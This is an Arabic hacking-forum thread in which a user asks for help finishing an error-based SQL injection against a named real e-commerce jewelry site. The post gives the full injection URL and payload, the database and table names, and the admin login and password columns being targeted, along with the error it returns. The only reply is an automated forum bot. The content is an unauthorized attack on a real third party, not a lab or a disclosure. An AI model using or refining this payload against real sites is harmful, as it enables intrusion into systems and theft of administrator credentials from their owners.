1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Mr-Sp!R!T | المشاهدات : 118 | الردود : 1
حالة الموضوع:
مغلق
  1. Mr-Sp!R!T Developer

    الأنتساب:
    ‏21 ديسمبر 2012
    المشاركات:
    90
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    I R A Q
    السلام عليكم ورحمة الله وبركاته

    إخواني بحقن موقع دبل كيري وهذا رابط الثغرة
    http://www.wholesale-indian-silver-j...view.php?id=74


    القاعدة wisj_db_com
    طيب انا استخرجت الجداول يلي بالقاعدة وبأحد الجداول يلي هو:
    tbl_site_config
    لقيت هذه الأعمدة:

    'site_admin_login_id' 'site_admin_password'

    تمام

    عند الاستخراج بيظهر خطأ بيجنني !!



    كود PHP:
         Cannot Run the Query:

    select from tbl_products where products_categories_id=74 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tbl_site_config.site_admin_l ogin_id as char),0x27,0x7eFROM `wisj_db_com`.tbl_site_config LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1-- - order by products_id
    as following error is encountered...





    مع العلم هذا هو رابط الاستغلال يلي عم احقن فيه:


    http://www.wholesale-indian-silver-jewelry.com/cat_view.php?id=74 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tbl_site_config.site_admin_l ogin_id as char),0x27,0x7e) FROM `wisj_db_com`.tbl_site_config LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--


    أرجوكم مساعدة لو سمحتم...


     
  2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة